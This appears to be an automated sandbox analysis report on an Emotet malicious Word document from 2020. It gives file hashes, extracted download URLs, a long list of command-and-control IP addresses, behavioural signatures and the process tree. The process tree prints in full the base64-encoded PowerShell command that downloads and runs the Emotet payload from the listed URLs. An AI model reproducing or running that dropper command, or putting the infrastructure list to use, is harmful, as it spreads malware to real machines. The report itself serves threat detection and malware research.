Analysis
-
max time kernel
137s -
max time network
131s -
platform
windows10_x64 -
resource
win10 -
submitted
23-09-2020 17:01
Static task
static1
Behavioral task
behavioral1
Sample
emotet_e1_7933d8d9847728baa3c56f3d63a5539deb3a9260f1d7e03df15affdaed3a57b9_2020-09-23__170016437769._doc.doc
Resource
win7
General
-
Target
emotet_e1_7933d8d9847728baa3c56f3d63a5539deb3a9260f1d7e03df15affdaed3a57b9_2020-09-23__170016437769._doc.doc
-
Size
160KB
-
MD5
0ed5a42c5691a1ab4c27bf8c2aed5210
-
SHA1
2d43412fc8c55c9a2d7a2c2d3f18c6adc96f867d
-
SHA256
7933d8d9847728baa3c56f3d63a5539deb3a9260f1d7e03df15affdaed3a57b9
-
SHA512
16034e9b9931d93b0f245f86fa4efb5aeabd86d9840087a86d1b691262703d6cd2b945fafe1a8044a87e5c7adf14eab0a1a01d4eb0fbbed6a840885276ebfe76
Malware Config
Extracted
http://khobormalda.com/wp-content/82/
http://blog.zunapro.com/wp-admin/LEE/
http://megasolucoesti.com/R9KDq0O8w/Y/
https://online24h.biz/wp-admin/K/
https://fepami.com/wp-includes/eaI/
http://ora-ks.com/system/cache/w/
http://padamagro.com/wp-admin/Nc/
Extracted
emotet
12.163.208.58:80
45.33.35.74:8080
87.106.253.248:8080
192.241.146.84:8080
190.115.18.139:8080
65.36.62.20:80
170.81.48.2:80
83.169.21.32:7080
185.232.182.218:80
190.2.31.172:80
77.106.157.34:8080
82.230.1.24:80
202.4.58.197:80
201.213.177.139:80
78.249.119.122:80
123.51.47.18:80
77.90.136.129:8080
60.93.23.51:80
152.169.22.67:80
190.117.79.209:80
60.108.144.104:443
213.197.182.158:8080
82.76.111.249:443
209.236.123.42:8080
190.24.243.186:80
177.74.228.34:80
191.182.6.118:80
96.245.123.149:80
61.197.92.216:80
1.226.84.243:8080
111.67.12.221:8080
216.47.196.104:80
185.94.252.27:443
70.116.143.84:80
187.162.248.237:80
217.13.106.14:8080
80.11.164.185:80
35.143.99.174:80
190.190.148.27:8080
219.92.13.25:80
70.32.115.157:8080
96.227.52.8:443
51.75.33.127:80
95.9.180.128:80
174.113.69.136:80
119.106.216.84:80
111.67.77.202:8080
91.105.94.200:80
178.250.54.208:8080
98.13.75.196:80
2.36.95.106:80
186.70.127.199:8090
116.202.23.3:8080
202.134.4.210:7080
50.28.51.143:8080
45.33.77.42:8080
67.247.242.247:80
137.74.106.111:7080
85.214.26.7:8080
181.30.61.163:443
77.238.212.227:80
185.215.227.107:443
186.103.141.250:443
50.121.220.50:80
74.136.144.133:80
104.131.41.185:8080
61.92.159.208:8080
104.131.103.37:8080
51.15.7.189:80
185.94.252.12:80
94.176.234.118:443
212.71.237.140:8080
5.196.35.138:7080
45.46.37.97:80
70.32.84.74:8080
199.203.62.165:80
38.88.126.202:8080
51.159.23.217:443
155.186.0.121:80
51.38.124.206:80
181.129.96.162:8080
64.201.88.132:80
92.24.50.153:80
189.2.177.210:443
45.16.226.117:443
76.168.54.203:80
185.178.10.77:80
220.109.145.69:80
192.81.38.31:80
68.183.170.114:8080
177.73.0.98:443
138.97.60.141:7080
192.241.143.52:8080
217.199.160.224:7080
185.183.16.47:80
177.129.17.170:443
5.189.178.202:8080
74.58.215.226:80
51.255.165.160:8080
12.162.84.2:8080
149.202.72.142:7080
87.106.46.107:8080
188.135.15.49:80
68.183.190.199:8080
172.104.169.32:8080
68.69.155.181:80
72.47.248.48:7080
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POWeRsHeLL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1848 3604 POWeRsHeLL.exe -
Emotet Payload 8 IoCs
Detects Emotet payload in memory.
Processes:
resource yara_rule behavioral2/memory/400-15-0x00000000004B0000-0x00000000004C2000-memory.dmp emotet behavioral2/memory/400-15-0x00000000004B0000-0x00000000004C2000-memory.dmp emotet behavioral2/memory/400-16-0x00000000004D0000-0x00000000004E0000-memory.dmp emotet behavioral2/memory/400-16-0x00000000004D0000-0x00000000004E0000-memory.dmp emotet behavioral2/memory/1464-19-0x0000000000430000-0x0000000000442000-memory.dmp emotet behavioral2/memory/1464-19-0x0000000000430000-0x0000000000442000-memory.dmp emotet behavioral2/memory/1464-20-0x00000000001F0000-0x0000000000200000-memory.dmp emotet behavioral2/memory/1464-20-0x00000000001F0000-0x0000000000200000-memory.dmp emotet -
Blacklisted process makes network request 4 IoCs
Processes:
POWeRsHeLL.exeflow pid process 14 1848 POWeRsHeLL.exe 16 1848 POWeRsHeLL.exe 18 1848 POWeRsHeLL.exe 35 1848 POWeRsHeLL.exe -
Executes dropped EXE 2 IoCs
Processes:
X9ouqft.exeMicrosoft.Uev.Office2010CustomActions.exepid process 400 X9ouqft.exe 1464 Microsoft.Uev.Office2010CustomActions.exe -
Drops file in System32 directory 1 IoCs
Processes:
X9ouqft.exedescription ioc process File opened for modification C:\Windows\SysWOW64\KBDSL\Microsoft.Uev.Office2010CustomActions.exe X9ouqft.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
WINWORD.EXEpid process 2896 WINWORD.EXE 2896 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 7 IoCs
Processes:
POWeRsHeLL.exeMicrosoft.Uev.Office2010CustomActions.exepid process 1848 POWeRsHeLL.exe 1848 POWeRsHeLL.exe 1848 POWeRsHeLL.exe 1464 Microsoft.Uev.Office2010CustomActions.exe 1464 Microsoft.Uev.Office2010CustomActions.exe 1464 Microsoft.Uev.Office2010CustomActions.exe 1464 Microsoft.Uev.Office2010CustomActions.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
POWeRsHeLL.exedescription pid process Token: SeDebugPrivilege 1848 POWeRsHeLL.exe -
Suspicious use of SetWindowsHookEx 9 IoCs
Processes:
WINWORD.EXEpid process 2896 WINWORD.EXE 2896 WINWORD.EXE 2896 WINWORD.EXE 2896 WINWORD.EXE 2896 WINWORD.EXE 2896 WINWORD.EXE 2896 WINWORD.EXE 2896 WINWORD.EXE 2896 WINWORD.EXE -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
POWeRsHeLL.exeX9ouqft.exedescription pid process target process PID 1848 wrote to memory of 400 1848 POWeRsHeLL.exe X9ouqft.exe PID 1848 wrote to memory of 400 1848 POWeRsHeLL.exe X9ouqft.exe PID 1848 wrote to memory of 400 1848 POWeRsHeLL.exe X9ouqft.exe PID 400 wrote to memory of 1464 400 X9ouqft.exe Microsoft.Uev.Office2010CustomActions.exe PID 400 wrote to memory of 1464 400 X9ouqft.exe Microsoft.Uev.Office2010CustomActions.exe PID 400 wrote to memory of 1464 400 X9ouqft.exe Microsoft.Uev.Office2010CustomActions.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXEPID:2896"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e1_7933d8d9847728baa3c56f3d63a5539deb3a9260f1d7e03df15affdaed3a57b9_2020-09-23__170016437769._doc.doc" /o ""Checks processor information in registryEnumerates system info in registrySuspicious behavior: AddClipboardFormatListenerSuspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWeRsHeLL.exePID:1848POWeRsHeLL -ENCOD JABCADQAegBtAGEAMQBiAD0AKAAoACcAVAAnACsAJwB5AHUAJwApACsAJwBhAHYAJwArACcAYwBoACcAKQA7ACYAKAAnAG4AJwArACcAZQB3AC0AaQB0ACcAKwAnAGUAbQAnACkAIAAkAEUAbgBWADoAdQBTAEUAcgBQAFIATwBGAEkAbABFAFwASAB5AHUAOQBoAFYAMwBcAE0AZgBOAFgATwAzAHcAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAHIARQBDAFQATwBSAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAHMAZQBgAGMAVQByAGkAdAB5AHAAYABSAG8AYABUAE8AQwBPAGwAIgAgAD0AIAAoACgAJwB0ACcAKwAnAGwAcwAnACkAKwAoACcAMQAyACcAKwAnACwAIAB0ACcAKQArACcAbAAnACsAKAAnAHMAJwArACcAMQAxACwAIAAnACkAKwAoACcAdABsACcAKwAnAHMAJwApACkAOwAkAFIAYwBkAHgAaQBjADgAIAA9ACAAKAAnAFgAJwArACgAJwA5AG8AJwArACcAdQAnACsAJwBxAGYAdAAnACkAKQA7ACQAQwB5AG8AdQBjAHAAZgA9ACgAJwBMAGYAJwArACgAJwB2AHAAJwArACcAbgB1AHQAJwApACkAOwAkAEUANwAyADcAMQBxAGMAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAKAAoACcAewAnACsAJwAwAH0ASAB5AHUAOQBoAHYAMwAnACsAJwB7ADAAfQBNAGYAJwArACcAbgAnACsAJwB4ACcAKwAnAG8AMwB3AHsAMAB9ACcAKQAgAC0AZgBbAGMASABhAFIAXQA5ADIAKQArACQAUgBjAGQAeABpAGMAOAArACgAJwAuACcAKwAoACcAZQB4ACcAKwAnAGUAJwApACkAOwAkAFEAZgBoAHQAYQAzAHQAPQAoACgAJwBaACcAKwAnADAAMgBxACcAKQArACcAbwBjACcAKwAnAHIAJwApADsAJABYAGcAdAA2AGkAMwB3AD0AJgAoACcAbgAnACsAJwBlAHcALQBvACcAKwAnAGIAagBlAGMAdAAnACkAIABuAGUAdAAuAHcAZQBCAEMAbABpAGUAbgB0ADsAJABWADUAaABqAGMAeQAxAD0AKAAnAGgAdAAnACsAJwB0ACcAKwAoACcAcAA6AC8AJwArACcALwAnACkAKwAnAGsAJwArACgAJwBoAG8AJwArACcAYgBvACcAKwAnAHIAbQAnACsAJwBhAGwAZABhACcAKQArACgAJwAuACcAKwAnAGMAbwAnACkAKwAnAG0AJwArACcALwAnACsAKAAnAHcAcAAnACsAJwAtAGMAbwBuAHQAZQAnACsAJwBuACcAKQArACcAdAAvACcAKwAnADgAJwArACcAMgAvACcAKwAnACoAaAAnACsAKAAnAHQAdABwACcAKwAnADoAJwArACcALwAvAGIAJwApACsAKAAnAGwAJwArACcAbwBnACcAKQArACcALgB6ACcAKwAoACcAdQBuAGEAcAAnACsAJwByACcAKQArACgAJwBvAC4AJwArACcAYwAnACkAKwAoACcAbwAnACsAJwBtAC8AdwBwAC0AJwApACsAKAAnAGEAJwArACcAZABtACcAKQArACcAaQAnACsAJwBuAC8AJwArACgAJwBMACcAKwAnAEUARQAvACcAKQArACgAJwAqAGgAdAB0ACcAKwAnAHAAOgAvAC8AJwArACcAbQAnACsAJwBlAGcAYQBzACcAKQArACgAJwBvAGwAdQAnACsAJwBjAG8AJwApACsAJwBlACcAKwAnAHMAJwArACgAJwB0AGkAJwArACcALgAnACsAJwBjAG8AbQAnACkAKwAnAC8AJwArACcAUgA5ACcAKwAoACcASwBEAHEAMABPACcAKwAnADgAJwApACsAJwB3ACcAKwAnAC8AJwArACgAJwBZAC8AJwArACcAKgAnACkAKwAnAGgAdAAnACsAKAAnAHQAcABzACcAKwAnADoALwAvAG8AJwApACsAJwBuACcAKwAoACcAbABpACcAKwAnAG4AZQAyADQAaAAuACcAKQArACcAYgBpACcAKwAoACcAegAnACsAJwAvAHcAJwArACcAcAAtAGEAZABtACcAKwAnAGkAbgAvACcAKQArACcASwAvACcAKwAoACcAKgBoAHQAdAAnACsAJwBwAHMAJwApACsAKAAnADoALwAnACsAJwAvACcAKQArACcAZgAnACsAJwBlAHAAJwArACgAJwBhAG0AJwArACcAaQAuAGMAJwApACsAKAAnAG8AJwArACcAbQAvAHcAJwApACsAJwBwAC0AJwArACgAJwBpAG4AYwAnACsAJwBsAHUAZABlACcAKwAnAHMAJwApACsAKAAnAC8AZQBhACcAKwAnAEkALwAqACcAKQArACcAaAAnACsAJwB0ACcAKwAnAHQAJwArACgAJwBwADoALwAnACsAJwAvAG8AJwApACsAJwByACcAKwAnAGEAJwArACcALQAnACsAKAAnAGsAcwAnACsAJwAuAGMAJwApACsAJwBvACcAKwAoACcAbQAvACcAKwAnAHMAJwApACsAJwB5AHMAJwArACcAdABlACcAKwAoACcAbQAvACcAKwAnAGMAYQBjACcAKQArACgAJwBoACcAKwAnAGUALwAnACkAKwAoACcAdwAvACcAKwAnACoAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAOgAvACcAKwAnAC8AcAAnACkAKwAnAGEAJwArACcAZABhACcAKwAoACcAbQAnACsAJwBhAGcAJwApACsAKAAnAHIAbwAuACcAKwAnAGMAJwArACcAbwBtAC8AdwAnACkAKwAoACcAcAAtACcAKwAnAGEAZAAnACkAKwAoACcAbQBpAG4AJwArACcALwAnACkAKwAnAE4AYwAnACsAJwAvACcAKQAuACIAcwBwAEwAYABpAHQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABIAGQAagBuAGwAcgBsAD0AKAAoACcATgB5AHUAcABzACcAKwAnADMAJwApACsAJwBiACcAKQA7AGYAbwByAGUAYQBjAGgAKAAkAE0ANABzAHkAaABfAGQAIABpAG4AIAAkAFYANQBoAGoAYwB5ADEAKQB7AHQAcgB5AHsAJABYAGcAdAA2AGkAMwB3AC4AIgBEAG8AdwBuAEwAYABvAEEAZABgAEYASQBgAGwARQAiACgAJABNADQAcwB5AGgAXwBkACwAIAAkAEUANwAyADcAMQBxAGMAKQA7ACQASwA1ADkAawAwAF8AdgA9ACgAKAAnAEQAXwB3ACcAKwAnAGUAeQAnACkAKwAnAHoAdAAnACkAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQBJAHQAZQAnACsAJwBtACcAKQAgACQARQA3ADIANwAxAHEAYwApAC4AIgBMAGAARQBuAEcAVABIACIAIAAtAGcAZQAgADIANwA3ADUANgApACAAewAmACgAJwBJAG4AdgBvACcAKwAnAGsAZQAtAEkAdAAnACsAJwBlACcAKwAnAG0AJwApACgAJABFADcAMgA3ADEAcQBjACkAOwAkAFEAZgBrAGsAZwBqAGcAPQAoACcAVwAnACsAKAAnAF8AbQAnACsAJwBpACcAKQArACgAJwBkACcAKwAnADgAaAAnACkAKQA7AGIAcgBlAGEAawA7ACQASwBiAHUAZgBoADAAawA9ACgAJwBYAGgAJwArACgAJwBtADYAJwArACcAZwB4ADYAJwApACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEUAMgA2AHcAMwBiAGgAPQAoACgAJwBUACcAKwAnAHEAYwBfAGkAJwApACsAJwBlAGIAJwApAA==Process spawned unexpected child processBlacklisted process makes network requestSuspicious behavior: EnumeratesProcessesSuspicious use of AdjustPrivilegeTokenSuspicious use of WriteProcessMemory
-
C:\Users\Admin\Hyu9hv3\Mfnxo3w\X9ouqft.exePID:400"C:\Users\Admin\Hyu9hv3\Mfnxo3w\X9ouqft.exe"Executes dropped EXEDrops file in System32 directorySuspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\KBDSL\Microsoft.Uev.Office2010CustomActions.exePID:1464"C:\Windows\SysWOW64\KBDSL\Microsoft.Uev.Office2010CustomActions.exe"Executes dropped EXESuspicious behavior: EnumeratesProcesses
Network
MITRE ATT&CK Matrix
Collection
Command and Control
Credential Access
Defense Evasion
Execution
Exfiltration
Impact
Initial Access
Lateral Movement
Persistence
Privilege Escalation
Replay Monitor
Downloads
-
C:\Users\Admin\Hyu9hV3\MfNXO3w\X9ouqft.exe
-
C:\Users\Admin\Hyu9hv3\Mfnxo3w\X9ouqft.exe
-
C:\Windows\SysWOW64\KBDSL\Microsoft.Uev.Office2010CustomActions.exe
-
memory/400-12-0x0000000000000000-mapping.dmp
-
memory/400-16-0x00000000004D0000-0x00000000004E0000-memory.dmpFilesize
64KB
-
memory/400-15-0x00000000004B0000-0x00000000004C2000-memory.dmpFilesize
72KB
-
memory/1464-20-0x00000000001F0000-0x0000000000200000-memory.dmpFilesize
64KB
-
memory/1464-19-0x0000000000430000-0x0000000000442000-memory.dmpFilesize
72KB
-
memory/1464-17-0x0000000000000000-mapping.dmp
-
memory/1848-10-0x0000017F4D3C0000-0x0000017F4D3C1000-memory.dmpFilesize
4KB
-
memory/1848-11-0x0000017F4D770000-0x0000017F4D771000-memory.dmpFilesize
4KB
-
memory/1848-9-0x00007FFBEBB10000-0x00007FFBEC4FC000-memory.dmpFilesize
9MB
-
memory/2896-0-0x00007FFBF2F20000-0x00007FFBF35E6000-memory.dmpFilesize
6MB
-
memory/2896-8-0x000002298FFF8000-0x000002298FFFD000-memory.dmpFilesize
20KB
-
memory/2896-7-0x000002298FFFD000-0x0000022990002000-memory.dmpFilesize
20KB
-
memory/2896-6-0x000002298D7AE000-0x000002298D7B5000-memory.dmpFilesize
28KB
-
memory/2896-5-0x000002298FE76000-0x000002298FE7B000-memory.dmpFilesize
20KB
-
memory/2896-4-0x000002298FE7B000-0x000002298FE80000-memory.dmpFilesize
20KB
-
memory/2896-3-0x000002298FE7B000-0x000002298FE80000-memory.dmpFilesize
20KB
-
memory/2896-2-0x000002298FE7B000-0x000002298FE80000-memory.dmpFilesize
20KB
-
memory/2896-1-0x000002298FE76000-0x000002298FE7B000-memory.dmpFilesize
20KB